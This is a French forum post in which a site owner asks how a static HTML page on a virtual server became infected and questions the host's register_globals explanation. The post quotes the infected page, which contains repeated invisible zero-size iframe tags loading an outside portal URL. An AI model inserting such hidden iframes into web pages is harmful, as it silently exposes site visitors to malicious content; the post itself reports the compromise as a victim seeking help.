j'ai un gros doute sur la sécurité d'un serveur virtuel (VDS). La situation est la suivante : comment expliquer qu'une page contenant strictement du html et strictement aucune variable, ni code PHP initialement codé ainsi:
CODE
<html>
<head><title>un titre</title></head>
<body>
<h1>un autre titre en h1</h1>
<ul>
<li>item</li>
<li>item</li>
<li>item</li>
<li>item</li>
</ul>
</body>
</html
<head><title>un titre</title></head>
<body>
<h1>un autre titre en h1</h1>
<ul>
<li>item</li>
<li>item</li>
<li>item</li>
<li>item</li>
</ul>
</body>
</html
puisse se retrouver infecté avec :
CODE
<html>
<head><title>un titre</title></head>
<body>
<h1>un autre titre en h1</h1>
<ul>
<li>item</li>
<li>item</li>
<li>item</li>
<li>item</li>
</ul>
</body>
</html
<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<head><title>un titre</title></head>
<body>
<h1>un autre titre en h1</h1>
<ul>
<li>item</li>
<li>item</li>
<li>item</li>
<li>item</li>
</ul>
</body>
</html
<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.kgeba.com/portal/index.php?aff=r3dlabel marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Mon hébergeur prétend que c'est à cause du register_global à ON plutôt que à OFF mais je ne vois pas le rapport ni la pertinence d'une telle réponse dans cas précis...
Le pire c'est que c'est la seule et unique page du site !!! Une idée ??